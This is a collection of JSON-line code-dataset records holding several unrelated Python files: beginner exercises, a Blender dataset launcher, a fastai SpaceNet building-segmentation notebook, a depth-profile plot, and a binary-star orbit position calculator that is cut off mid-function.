\"%Y-%m-%d\")\r\n                darbuotojas.position = input(\"Enter the position\")\r\n                darbuotojas.salary = float(input(\"Enter the salary\"))\r\n                session.commit()\r\n                break\r\n            except:\r\n                print(\"Error. Please try again\")\r\n    if pasirinkimas == 8:\r\n        visi = session.query(Darbuotojas).all()\r\n        for darbuotojas in visi:\r\n            print(darbuotojas)\r\n    if pasirinkimas == 9:\r\n        print(\"Goodbye\")\r\n        break\r\n\r\n","repo_name":"DonatasNoreika/python1lygis","sub_path":"Programos/Duomenų bazės 2 - SQLAlchemy ORM/1 užduotis/1uzduotis.py","file_name":"1uzduotis.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"lt","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"74716445607","text":"# Ask the user to enter numbers and print a message saying \r\n# whether each one is even or odd. The loop must end when the \r\n# user enters 0.\r\n\r\n\r\nwhile(True):\r\n    x = int(input(\"Enter a number to find out whether it is even or odd\"\r\n    \" (enter 0 to exit)\\n\"))\r\n    if (x == 0):\r\n        break\r\n    elif (x % 2 == 0):\r\n        print(f\"The number {x} is EVEN\")\r\n    else:\r\n        print(f\"The number {x} is ODD\")\r\n\r\nprint(\"END OF EXECUTION\")\r\n","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/ejercicios_complementarios/02_repetitivas/ej05.py","file_name":"ej05.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35858876807","text":"\"\"\"\nGiven two sorted arrays nums1 and nums2 of sizes m and n,\n\nfind the median of the two sorted arrays; the required time complexity of the algorithm is O(log(m + n)).\n\nYou may assume that nums1 and nums2 are not both empty.\n\nExample 1:\n\nnums1 = [1, 3]\nnums2 = [2]\n\nThe median is 2.0\nExample 2:\n\nnums1 = [1, 2]\nnums2 = [3, 4]\n\nThe median is (2 + 3)/2 = 2.5\n\"\"\"\n\n\ndef find_median_sorted_arrays(nums1: list, nums2: list) -> float:\n    nums = nums1+nums2\n    nums = sorted(nums)\n    print(nums)\n    length = len(nums)\n    if length == 1:\n        return float(nums[0])\n    elif length % 2:\n        return float(nums[length // 2 ])\n    else:\n        mid = length // 2\n        return (nums[mid]+nums[mid-1]) / 2\n\n\nif __name__ == '__main__':\n    a = [1, 3]\n    b = [2]\n    print(find_median_sorted_arrays(a, b))\n","repo_name":"ZhangzhiS/study_note","sub_path":"Algorithm/median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44595138694","text":"import json\nimport os\n\nfrom utils import post_processing\n\n\ndef create_dataset():\n    \"\"\"read the config file\"\"\"\n    with open(\"/root/config.json\", \"r\") as f:\n        config = json.load(f)\n\n    # create environmental variables\n    for (key, value) in 
config.items():\n os.environ[key] = str(value)\n\n # run blender\n command = '/usr/lib/blender/blender {} --python {} --background'.\\\n format(\"/root/models/default.blend\", \"/root/rendering.py\")\n os.system(command)\n\n # post processing\n post_processing()\n\n\nif __name__ == '__main__':\n create_dataset()","repo_name":"defqoon/synthetic-data-generator","sub_path":"src/dataset_creation.py","file_name":"dataset_creation.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"33088782060","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Spacenet\n# \n# https://medium.com/the-downlinq/establishing-a-machine-learning-workflow-530628cfe67\n# \n# https://medium.com/the-downlinq/object-detection-on-spacenet-5e691961d257\n# \n# https://medium.com/the-downlinq/the-spacenet-metric-612183cc2ddb\n# \n# https://medium.com/the-downlinq/a-baseline-model-for-the-spacenet-4-off-nadir-building-detection-challenge-6b7983312b4b\n# \n# https://medium.com/the-downlinq\n# \n# Fastai lesson 3\n# \n# https://github.com/hiromis/notes/blob/master/Lesson3.md\n# \n\n\n# In[2]:\n\n\nimport datetime\nimport uuid\n\n\n# In[3]:\n\n\nfrom fastai import *\nfrom fastai.vision import *\nfrom fastai.callbacks.hooks import *\n\n\n# In[4]:\n\n\nimport PIL.Image as pil_image\n\n\n# In[5]:\n\n\nimport fastai\nprint(fastai.__version__)\n\n\n# In[6]:\n\n\ntorch.cuda.set_device(1)\n\n\n# In[7]:\n\n\nDATE = datetime.datetime.today().strftime('%Y%m%d')\nprint(f'DATE: {DATE}') \n\n\n# In[8]:\n\n\n#bs of 8\n#DATE='20181204'\n\n\n# In[9]:\n\n\nUID=str(uuid.uuid4())[:8]\nprint(f'UID: {UID}') \n\n\n# In[10]:\n\n\n#UID='81940436'\n\n\n# In[11]:\n\n\nARCH = models.resnet34\nARCH_NAME = 'rn34'\nMODEL_NAME = 'unet'\n\n\n# In[12]:\n\n\nSUB_NUM='1'\n\n\n# In[13]:\n\n\npath = Path('../../../data/SpaceNet_Off-Nadir_Dataset')\n\n\n# In[14]:\n\n\nssd_path = Path('../../../ssd_data/SpaceNet_Off-Nadir_Dataset')\nssd_path.ls()\n\n\n# In[15]:\n\n\npath_original_lbl = path/'masks'\npath_original_img = path/'train_rgb'\nfnames_original = get_image_files(path_original_img)\nlbl_original_names = get_image_files(path_original_lbl)\n\n\n# In[16]:\n\n\npath_hd_img = path/'resized_train'\npath_hd_lbl = path/'resized_masks'\npath_hd_test = path/'resized_test'\n\n\n# In[17]:\n\n\ninput_hd_test = path/'test_rgb'\ninput_test = ssd_path/'test_rgb'\n\n\n# In[18]:\n\n\npath_img = ssd_path/'resized_train'\npath_lbl = ssd_path/'resized_masks'\npath_test = ssd_path/'resized_test'\n\n\n# In[19]:\n\n\nfnames = get_image_files(path_img)\nlbl_names = get_image_files(path_lbl)\ntest_fnames = get_image_files(path_test)\nfnames[:2], lbl_names[:2], test_fnames[:2] \n\n\n# In[20]:\n\n\nlen(fnames), len(lbl_names), len(test_fnames)\n\n\n# In[21]:\n\n\n#only 1064 masks and images - but multiple nadirs\n\n\n# In[22]:\n\n\nimage_ids =[]\nimage_names=[]\nchannel_types=[]\nnadir_angles=[]\nmask_names=[]\nnadir_types=[]\nfor n in fnames:\n parts = str(n).split('_')\n im_id = '_'.join(parts[-2:])\n image_ids.append(im_id)\n indici = [i for i, s in enumerate(parts) if 'nadir' in s]\n indici=indici[0]\n \n nadir_angle = parts[indici].split('nadir')[1]\n nadir_angles.append(nadir_angle)\n if int(nadir_angle) < 26:\n angle_set = 'nadir'\n elif int(nadir_angle) > 25 and int(nadir_angle) < 40:\n angle_set = 'offnadir'\n elif int(nadir_angle) > 40:\n angle_set = 'faroffnadir'\n nadir_types.append(angle_set)\n \n fname_part = str(n).split('/')[-1]\n image_names.append(fname_part)\n \n 
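# the file names embed '<channel>_Atlanta_nadir<angle>_..._<im_id>', so everything\n    # before 'Atlanta' (minus the trailing underscore) is taken as the channel prefix\n    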
channel_type = str(fname_part).split('Atlanta')[0][:-1]\n channel_types.append(channel_type)\n \n mask_name = 'mask_'+im_id\n mask_names.append(mask_name)\n\n\n# In[23]:\n\n\nlen(list(set(image_ids)))\n\n\n# In[24]:\n\n\ntrain_df = pd.DataFrame(\n {'image_name': image_names,\n 'channel_type': channel_types,\n 'nadir_angle': nadir_angles,\n 'nadir_type': nadir_types,\n 'mask_name': mask_names\n })\n\n\n# In[25]:\n\n\ntrain_df.head()\n\n\n# In[26]:\n\n\ntrain_df['channel_type'].unique()\n\n\n# In[27]:\n\n\ntrain_df['nadir_angle'].unique()\n\n\n# In[28]:\n\n\nmask_n = train_df['mask_name'][0]\nmask = open_mask(path_lbl/f'{mask_n}', div=True)\nsrc_size = np.array(mask.shape[1:])\n\n\n# In[29]:\n\n\nmask.shape[1:], src_size\n\n\n# ## Make DataBunch\n\n# In[30]:\n\n\nsize = src_size\nbs=4\n\n\n# In[31]:\n\n\ncodes = np.array(['nadir','offnadir','faroffnadir'])\n\n\n# In[32]:\n\n\nholdout_grids = ['735851','747551','741251','746201']\nvalid_idx = [i for i,o in enumerate(fnames) if any(c in str(o) for c in holdout_grids)]\n\n\n# In[33]:\n\n\nlen(valid_idx)\n\n\n# In[34]:\n\n\ndef get_y_fn(full_name):\n parts = str(full_name).split('_')\n im_id = '_'.join(parts[-2:])\n mask_name = 'mask_'+im_id\n return path_lbl/f'{mask_name}'\n\n\n# In[35]:\n\n\n# overriding to set open_mask(fn, div=True), probably a better way to do this\n# idea from https://forums.fast.ai/t/unet-binary-segmentation/29833/19\n\nclass MySegmentationLabelList(ImageItemList):\n def __init__(self, items:Iterator, classes:Collection=None, **kwargs):\n super().__init__(items, **kwargs)\n self.classes,self.loss_func = classes,CrossEntropyFlat()\n self.c = len(self.classes)\n\n def new(self, items, classes=None, **kwargs):\n return self.__class__(items, ifnone(classes, self.classes), **kwargs)\n\n def open(self, fn): return open_mask(fn, div=True)\n \nclass MySegmentationItemList(ImageItemList): _label_cls = SegmentationLabelList\n\n\n# In[36]:\n\n\n#if dont have split_by_idx then get wrong type\n\n\n# In[37]:\n\n\ndef create_my_data():\n src = (MySegmentationItemList.from_folder(path_img)\n .split_by_idx(valid_idx)\n .label_from_func(get_y_fn, classes=codes))\n tfms = get_transforms(flip_vert=True, max_warp=0, max_zoom=1.2, max_lighting=0.3)\n data = (src.transform(tfms, size=size, tfm_y=True)\n .databunch(bs=bs)\n .normalize(imagenet_stats))\n return src, tfms, data\n\n\n# In[38]:\n\n\ndef create_data():\n src = (SegmentationItemList.from_folder(path_img)\n .split_by_idx(valid_idx)\n .label_from_func(get_y_fn, classes=codes))\n tfms = get_transforms(flip_vert=True, max_warp=0, max_zoom=1.2, max_lighting=0.3)\n #transform mask in same way as image - tfm_y=True\n data = (src.transform(tfms, size=size, tfm_y=True)\n .databunch(bs=bs)\n .normalize(imagenet_stats))\n return src, tfms, data\n\n\n# In[39]:\n\n\n#src, tfms, data = create_my_data()\n\n\n# In[40]:\n\n\nsrc, tfms, data = create_data()\n\n\n# In[41]:\n\n\ndata.show_batch(2, figsize=(10,7))\n\n\n# In[42]:\n\n\ndata.show_batch(2, figsize=(10,7), ds_type=DatasetType.Valid)\n\n\n# ### save data for later re-load\n\n# In[43]:\n\n\ndata.export()\n\n\n# In[44]:\n\n\ndata.train_ds.x[1]\n\n\n# In[45]:\n\n\ndata.train_ds.y[1]\n\n\n# In[46]:\n\n\ndata.train_ds.y[1].data\n\n\n# In[47]:\n\n\n#data.show_batch(2,figsize=(4,4))\n\n\n# In[48]:\n\n\n#data.show_batch(2,figsize=(4,4), ds_type=DatasetType.Valid)\n\n\n# ## Train\n\n# In[49]:\n\n\niou = partial(dice, iou=True)\nmetrics = [iou, dice]\n\n\n# In[50]:\n\n\nlearn = unet_learner(data, ARCH, metrics=[accuracy])\n\n\n# In[51]:\n\n\n#cant do 
this with dynamic unet\n#learn.model = torch.nn.DataParallel(learn.model, device_ids=[0, 1])\n\n\n# In[52]:\n\n\n#layer_groups_total = len(learn.layer_groups[0])\n#for i in range(layer_groups_total):\n# learn.layer_groups[0][i] = nn.DataParallel(learn.layer_groups[0][i], device_ids=[0, 1])\n\n\n# In[53]:\n\n\nlearn.lr_find()\nlearn.recorder.plot()\n\n\n# In[ ]:\n\n\nlr = 1e-3\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=lr)\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage1')\n\n\n# In[ ]:\n\n\nlearn.load(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage1')\n\n\n# In[ ]:\n\n\nlearn.unfreeze()\n\n\n# In[ ]:\n\n\nlearn.lr_find()\nlearn.recorder.plot()\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=slice(1e-5,lr/5))\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage2')\n\n\n# In[ ]:\n\n\nlearn.load(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage2')\n\n\n# In[ ]:\n\n\nlearn.unfreeze()\n\n\n# In[ ]:\n\n\nlearn.lr_find()\nlearn.recorder.plot()\n\n\n# In[ ]:\n\n\ndef acc_fixed(input, targs):\n #input.shape: torch.Size([4, 3, 450, 450]), targs.shape: torch.Size([4, 1, 450, 450]) \n n = targs.shape[0]\n targs = targs.squeeze(1)\n #reshape the tensor to n rows, unknown number of columns\n targs = targs.view(n,-1)\n #targs.view: torch.Size([4, 202500])\n #Returns the indices of the maximum values along an axis\n input = input.view(n,3,-1).argmax(dim=1)\n #input.view: torch.Size([4, 202500])\n return (input==targs).float().mean()\n\n\n# In[ ]:\n\n\nlearn.metrics = [acc_fixed, iou, dice]\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=slice(1e-5,1e-3))\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage2_2')\n\n\n# In[ ]:\n\n\nlearn.model.train()\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=slice(1e-5,1e-3))\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage3')\n\n\n# ## Preds\n\n# https://spacenetchallenge.github.io/datasets/spacenet-OffNadir-summary.html\n# \n# In the SpaceNet Off-Nadir Building Extraction Challenge, the metric for ranking entries is the SpaceNet Metric.\n# This metric is an F1-Score based on the intersection over union of two building footprints with a threshold of 0.5\n# \n# F1-Score is calculated by taking the total True Positives, False Positives, and False Negatives for each nadir segement and then averaging the F1-Score for each segement.\n# \n# F1-Score Total = mean(F1-Score-Nadir, F1-Score-Off-Nadir, F1-Score-Very-Off-Nadir)\n\n# Your output must be a CSV file with almost identical format to the building footprint definition files.\n# \n# ImageId,BuildingId,PolygonWKT_Pix,Confidence\n# \n# Your output file may or may not include the above header line. The rest of the lines should specify the buildings your algorithm extracted, one per line.\n# \n# The required fields are:\n# \n# ImageId is a string that uniquely identifies the image.\n# BuildingId is an integer that identifies a building in the image, it should be unique within an image and must be positive unless the special id of -1 is used. -1 must be used to signal that there are no buildings in the image.\n# PolygonWKT_Pix specifies the points of the shape that represents the building you found. The format is exactly the same as given above in the Input files section. Important to know that the coordinates must be given in the scale of the 3-band images. 
So if you find a building that has a corner at (40, 20) on the 3-band image and (10, 5) on the corresponding 8-band image then your output file should have a (40 20 0) coordinate triplet listed in the shape definition.\n# Confidence is a positive real number, higher numbers mean you are more confident that this building is indeed present. See the details of scoring for how this value is used.\n# Your output must be a single file with .csv extension. Optionally the file may be zipped, in which case it must have .zip extension. The file must not be larger than 150MB and must not contain more than 2 million lines.\n# \n# Your algorithm must process the image tiles of the test set one by one, that is when you are predicting building footprints you must not use information from other tiles of the test set.\n# \n\n# In[ ]:\n\n\npath_test = path/'resized_test'\ntest_fnames = get_image_files(path_test)\n\n\n# In[ ]:\n\n\nlearn.load(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage3')\nlearn.model.eval()\n\n\n# In[ ]:\n\n\ndef pred_images(test_file_names):\n #im_files = glob.glob(f\"{test_path}/*.png\")\n i=0\n for fname in test_file_names:\n # load image and predict\n img = open_image(fname)\n pred_class, pred_idx, outputs = learn.predict(img)\n if i<10:\n display(img); display(names[pred_class]); display(outputs)\n i+=1\n\n\n# In[ ]:\n\n\npred_images(test_fnames)\n\n\n# In[ ]:\n\n\noutputs.shape\n\n\n# In[ ]:\n\n\nplt.imshow((to_np(outputs[0][1])))\n\n\n# In[ ]:\n\n\nfor i in range(20):\n\n fig, (ax1, ax2) = plt.subplots(1,2, figsize=(10,5))\n\n data.valid_ds.x[i].show(ax=ax1)\n ax1.set_title('Prediction')\n ax1.imshow((to_np(outputs[i][1])), alpha=0.6)\n \n ax2.set_title('Ground Truth')\n data.valid_ds.x[i].show(ax=ax2)\n data.valid_ds.y[i].show(ax=ax2, alpha=0.6)\n plt.show()\n\n\n# In[ ]:\n\n\n# see stpacenetutilities.labeltools.corelabeltools createGeoJSONFromRaster\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"adriangrepo/spacenet_buildingdetector","sub_path":"dl/scripts/spacenet.py","file_name":"spacenet.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29375070275","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Gaussian profile\ndef bottom_gauss(H0,sill_height,sill_position,sill_width):\n H = np.ones(Ndx)*H0\n gauss = sill_height*np.exp(-(np.linspace(-1,1,Ndx)-sill_position)**2/(2*sill_width**2))\n return H - gauss\n\nL = 200e3\na,b = 0,L #Lower and upper boundaries of the domain\nNdx = 200 #Number of grid steps\ndx = (b-a)/Ndx\n\nx = np.linspace(a,b,Ndx)\n\nH = bottom_gauss(500,450,-1/2,0.1)\n\nplt.figure()\nplt.plot(x/1000,-H,'k')\nplt.axhline(y=0, color='r', linestyle='--')\nplt.fill(x/1000,-H)\nplt.xlim([x[0]/1000,x[-1]/1000])\nplt.ylim([-500,10])\nplt.xlabel(r'$x$ (km)')\nplt.ylabel('depth (m)')\nplt.grid()\nplt.show()\nplt.savefig('depth_profile.png',dpi=300)","repo_name":"akotilis/SOAC-Project","sub_path":"depth_profile.py","file_name":"depth_profile.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24735083937","text":"from math import sin, cos, tan, atan, sqrt, radians, pi\r\nglobal no_of_with_orbits, max_loops\r\n\r\norb_wds_disc = [] # key: coor_2k & discoverer designation & components\r\norb_per = []\r\norb_alfa = []\r\norb_incl = []\r\norb_node = []\r\norb_time = []\r\norb_ecc = 
[]\r\norb_long = []\r\norb_grade = []\r\norb_may_be_calc = []\r\norb_per_e = []\r\norb_alfa_e = [] \r\norb_incl_e = [] \r\norb_node_e = []\r\norb_time_e = []\r\norb_ecc_e = []\r\norb_long_e = []\r\norb_has_errors = []\r\n\r\nclass Position:\r\n\r\n def __init__(self, coor_2k, disc, comp, date_last, pa_last, sep_last, note):\r\n\r\n self.coor_2k = coor_2k\r\n self.disc = disc\r\n self.comp = comp\r\n self.epoch = float(date_last)\r\n self.obsv_pos_pa = float(pa_last) # last precise\r\n self.obsv_pos_sep = float(sep_last) # last precise\r\n self.note = note\r\n self.calc_pos_pa = 0 #\r\n self.calc_pos_sep = 0 #\r\n self.diff_pos_pa = 0 #\r\n self.diff_pos_sep = 0 #\r\n self.calc_pos_pa_err_min = 0 # - error\r\n self.calc_pos_sep_err_min = 0 # - error\r\n self.calc_pos_pa_err_max = 0 # + error\r\n self.calc_pos_sep_err_max = 0 # + error\r\n\r\n return\r\n\r\n @classmethod\r\n def get(cls, text_str):\r\n\r\n coor_2k = text_str[0:10]\r\n disc = text_str[10:17]\r\n comp = text_str[17:22]\r\n date_last = text_str[28:32]\r\n pa_last = text_str[38:44]\r\n sep_last = text_str[46:53]\r\n note = text_str[106:110]\r\n\r\n return cls(coor_2k, disc, comp, date_last, pa_last, sep_last, note)\r\n\r\n def has_orbit(self):\r\n\r\n if self.note[0] == 'O' or self.note[1] == 'O' or self.note[2] == 'O' or \\\r\n self.note[0] == 'C' or self.note[1] == 'C' or self.note[2] == 'C':\r\n\r\n return True\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n def make_header1():\r\n\r\n return '||Observed|Observed|Calculated|Calculated|Difference|Difference|Error Min|Error Min|Error Max|Error Max|'\r\n\r\n @staticmethod\r\n def make_header2():\r\n\r\n return 'Identification|Epoch|Position Angle|Separation|Position Angle|Separation|Position Angle|Separation|' \\\r\n 'Position Angle|Separation|Position Angle|Separation|Orbit Grade|'\r\n\r\n def make_line(self,grade):\r\n\r\n return self.coor_2k + self.disc + self.comp + '|' + str(self.epoch) + '|' + \\\r\n str(self.obsv_pos_pa) + '|' + str(self.obsv_pos_sep) + '|' + str(self.calc_pos_pa) + '|' + \\\r\n str(self.calc_pos_sep) + '|' + str(self.diff_pos_pa) + '|' + str(self.diff_pos_sep) + '|' + \\\r\n str(self.calc_pos_pa_err_min) + '|' + str(self.calc_pos_sep_err_min) + '|' + \\\r\n str(self.calc_pos_pa_err_max) + '|' + str(self.calc_pos_sep_err_max) + '|' + str(grade)+'|'\r\n\r\n @staticmethod\r\n def make_footer1():\r\n\r\n return 'Obs. in wds|With orbits|Not found|Written with orbits|||||'\r\n\r\n @staticmethod\r\n def make_footer2(n1, n2, n3, n4, n5):\r\n\r\n return str(n1) + '|' + str(n2) + '|' + str(n3) + '|' + str(n4) + '|' + str(n5) + '||||'\r\n\r\n @staticmethod\r\n def diff(pa_1, pa_2, sep_1, sep_2): # _1: calc _2: obsv\r\n\r\n add_1 = 0\r\n add_2 = 0\r\n\r\n if pa_2 > 180 > pa_1:\r\n add_2 = 360\r\n elif pa_2 < 180 < pa_1:\r\n add_1 = 360\r\n\r\n diff_pa = abs(round((pa_1 + add_1) - (pa_2 + add_2), 2))\r\n\r\n if diff_pa > 360:\r\n diff_pa -= 360\r\n diff_pa = round(diff_pa, 2)\r\n\r\n diff_sep = abs(round(sep_1 - sep_2, 2))\r\n\r\n return diff_pa, diff_sep\r\n\r\n @staticmethod\r\n def calc(per, alfa, incl, long, time, ecc, node, epoch, max_loops):\r\n\r\n pa = 0\r\n sep = 0\r\n\r\n if per <= 0:\r\n print('! 
Period <= ZERO - Position cannot be calculated')\r\n else:\r\n c = pi * 2\r\n incl_rad = radians(incl)\r\n node_rad = radians(node)\r\n long_rad = radians(long)\r\n n = c / per\r\n ma = n * (epoch - time)\r\n m = ma - c * int(ma / c)\r\n ea = m\r\n a = ea - (ecc * sin(ea)) - m\r\n loops = 0\r\n while (abs(a) >= 1E-15) and (loops < max_loops):\r\n loops += 1\r\n a = a / (1 - (ecc * cos(ea)))\r\n ea = ea - a\r\n a = ea - (ecc * sin(ea)) - m\r\n if loops == max_loops:\r\n print('! Calculation of anomaly requires > max_loops - stopped - cannot calculate')\r\n else:\r\n tu = sqrt((1 + ecc) / (1 - ecc)) * tan(ea / 2)\r\n nu = 2 * atan(tu)\r\n r = alfa - alfa * ecc * cos(ea)\r\n y = sin(nu + long_rad) * cos(incl_rad)\r\n x = cos(nu + long_rad)\r\n q = atan(y / x)\r\n if x < 0:\r\n q = q + pi\r\n else:\r\n if q < 0:\r\n q = q + c\r\n th = q + node_rad\r\n if th > c:\r\n th = th - c\r\n rh = r * x / cos(q)\r\n pa = int(th / radians(1) * 10 + 0.5) / 10\r\n sep = int(rh * 100 + 0.5) / 100\r\n\r\n return pa, sep\r\n\r\n\r\nclass Orbit:\r\n\r\n def __init__(self, wds, disc, peri, peri_unit, peri_error, alfa, alfa_error, alfa_unit, incl, incl_error, node,\r\n node_error, time_peri, time_unit, time_error, ecc, ecc_error, long, long_error, grade):\r\n\r\n self.wds = wds\r\n self.disc = disc # discoverer designation & components\r\n self.per = float(peri)\r\n self.per_u = peri_unit\r\n self.per_e = float(peri_error)\r\n self.alfa = float(alfa)\r\n self.alfa_u = alfa_unit\r\n self.alfa_e = float(alfa_error)\r\n self.incl = float(incl)\r\n self.incl_e = float(incl_error)\r\n self.node = float(node)\r\n self.node_e = float(node_error)\r\n self.time = float(time_peri)\r\n self.time_u = time_unit\r\n self.time_e = float(time_error)\r\n self.ecc = float(ecc)\r\n self.ecc_e = float(ecc_error)\r\n self.long = float(long)\r\n self.long_e = float(long_error)\r\n self.grade = int(grade)\r\n self.calc = True\r\n\r\n def show_error(self):\r\n\r\n return self.wds + str(self.per_e) + '|' + str(self.alfa_e) + '|' + str(self.incl_e) + '|' + \\\r\n str(self.node_e) + '|' + str(self.time_e) + '|' + str(self.ecc_e) + '|' + str(self.long_e) + '|'\r\n\r\n @classmethod\r\n def get(cls, text_str):\r\n\r\n ra, dec, wds, disc, ads, hd, hip, mag1, mag_flag1, vis_mag2, mag_flag2, peri, peri_unit, peri_error, alfa, \\\r\n alfa_unit, alfa_error, incl, incl_error, node, node_asc, node_error, time_peri, time_unit, \\\r\n time_error, ecc, ecc_error, long, long_error, eqnx, last_obs, grade, notes, ref, name \\\r\n = text_str.split('|')\r\n\r\n def c0(c):\r\n if c == '' or c == '--.':\r\n return '0'\r\n else:\r\n return c\r\n\r\n return cls(wds, disc, c0(peri), peri_unit, c0(peri_error), c0(alfa), c0(alfa_error), alfa_unit, c0(incl),\r\n c0(incl_error),c0(node), c0(node_error), c0(time_peri), time_unit, c0(time_error), c0(ecc),\r\n c0(ecc_error), c0(long), c0(long_error), c0(grade))\r\n\r\n def is_calcuable(self):\r\n\r\n if self.grade in range(1, 6) and self.per_u == 'y' and self.alfa_u == 'a':\r\n return True\r\n else:\r\n self.calc = False # overwrite to skip\r\n return False\r\n\r\n def make_line(self):\r\n\r\n return self.wds + self.disc + '|' + str(self.per) + '|' + self.per_u + '|' + str(self.alfa) + '|' + \\\r\n str(self.incl) + '|' + str(self.node) + '|' + str(self.time) + '|' + str(self.ecc) + '|' + \\\r\n str(self.long) + '|' + str(self.grade) + '|'\r\n\r\n def append_orbit_elt(self):\r\n\r\n orb_wds_disc.append(self.wds+self.disc)\r\n \r\n orb_per.append(self.per)\r\n orb_alfa.append(self.alfa)\r\n orb_incl.append(self.incl)\r\n 
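# (the orb_* names are module-level parallel lists: one entry per catalogue\r\n        # orbit, addressed later through the index of its key in orb_wds_disc)\r\n        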
orb_node.append(self.node)\r\n        orb_time.append(self.time)\r\n        orb_ecc.append(self.ecc)\r\n        orb_long.append(self.long)\r\n        orb_grade.append(self.grade)\r\n\r\n        orb_may_be_calc.append(self.calc)\r\n\r\n        orb_per_e.append(self.per_e)\r\n        orb_alfa_e.append(self.alfa_e) \r\n        orb_incl_e.append(self.incl_e) \r\n        orb_node_e.append(self.node_e) \r\n        orb_time_e.append(self.time_e) \r\n        orb_ecc_e.append(self.ecc_e) \r\n        orb_long_e.append(self.long_e)\r\n\r\n        if self.per_e == 0 and self.alfa_e == 0 and self.incl_e == 0 and self.node_e == 0 and self.time_e == 0 and \\\r\n                self.ecc_e == 0 and self.long_e == 0:\r\n            errors = False\r\n        else:\r\n            errors = True\r\n        orb_has_errors.append(errors)\r\n\r\n        return\r\n\r\ndef get_wds_make_files(max_loops, acc_pa, acc_sep, calc_with_errors):\r\n\r\n    f = open('Input_Files/wds_precise.txt', 'r')  # all last precise positions in wds\r\n    pn = open('Output_Files/not found key in 6thorbit.txt', 'w')  # orbit not found (key reference missing or inexact)\r\n    p0 = open('Output_Files/wds_positions_all.txt', 'w')  # last precise positions of physical pairs (...have orbits)\r\n    p1 = open('Output_Files/wds_positions_acc.txt', 'w')  # difference in PA <= acc_pa and difference in Sep. <= acc_sep\r\n    p2 = open('Output_Files/wds_positions_pa_off.txt', 'w')  # PA > acc_pa and Sep. <= acc_sep\r\n    p3 = open('Output_Files/wds_positions_sep_off.txt', 'w')  # PA <= acc_pa and Sep. > acc_sep\r\n    p4 = open('Output_Files/wds_positions_pa_sep_off.txt', 'w')  # PA > acc_pa and Sep. > acc_sep\r\n\r\n    global no_of_with_orbits\r\n    no_of_wds_obsv = 0\r\n    no_of_with_orbits = 0\r\n    no_of_not_found = 0\r\n    no_of_skipped = 0\r\n    no_of_with_orbits_write = 0\r\n\r\n    pn.write(Position.make_header1())\r\n    pn.write('\\n')\r\n    pn.write(Position.make_header2())\r\n    pn.write('\\n')\r\n    p0.write(Position.make_header1())\r\n    p0.write('\\n')\r\n    p0.write(Position.make_header2())\r\n    p0.write('\\n')\r\n    p1.write(Position.make_header1())\r\n    p1.write('\\n')\r\n    p1.write(Position.make_header2())\r\n    p1.write('\\n')\r\n    p2.write(Position.make_header1())\r\n    p2.write('\\n')\r\n    p2.write(Position.make_header2())\r\n    p2.write('\\n')\r\n    p3.write(Position.make_header1())\r\n    p3.write('\\n')\r\n    p3.write(Position.make_header2())\r\n    p3.write('\\n')\r\n    p4.write(Position.make_header1())\r\n    p4.write('\\n')\r\n    p4.write(Position.make_header2())\r\n    p4.write('\\n')\r\n\r\n    for pos in f:\r\n        no_of_wds_obsv += 1\r\n        ix = 0\r\n        w = Position.get(pos)\r\n        if Position.has_orbit(w):\r\n            no_of_with_orbits += 1\r\n            comp_with_spc = w.comp\r\n            comp_with_no_spc = comp_with_spc.rstrip()\r\n            try:\r\n                ix = orb_wds_disc.index(w.coor_2k+w.disc+comp_with_no_spc)\r\n                if orb_may_be_calc[ix]:\r\n                    print('Calculating Position of '+w.coor_2k+w.disc+comp_with_no_spc)\r\n                    w.calc_pos_pa, w.calc_pos_sep = Position.calc(orb_per[ix], orb_alfa[ix],\r\n                                                                  orb_incl[ix], orb_long[ix],\r\n                                                                  orb_time[ix], orb_ecc[ix],\r\n                                                                  orb_node[ix], w.epoch, max_loops)\r\n\r\n                    w.diff_pos_pa, w.diff_pos_sep = Position.diff(w.calc_pos_pa, w.obsv_pos_pa, w.calc_pos_sep, w.obsv_pos_sep)\r\n\r\n                    if calc_with_errors:\r\n                        if orb_has_errors[ix]:\r\n                            print('Calculating with Errors - Differences of ' + w.coor_2k + w.disc + comp_with_no_spc)\r\n                            w.calc_pos_pa_err_min, w.calc_pos_sep_err_min = Position.calc(orb_per[ix] - orb_per_e[ix],\r\n                                                                                        orb_alfa[ix] - orb_alfa_e[ix],\r\n                                                                                        orb_incl[ix] - orb_incl_e[ix],\r\n                                                                                        orb_long[ix] - orb_long_e[ix],\r\n                                                                                        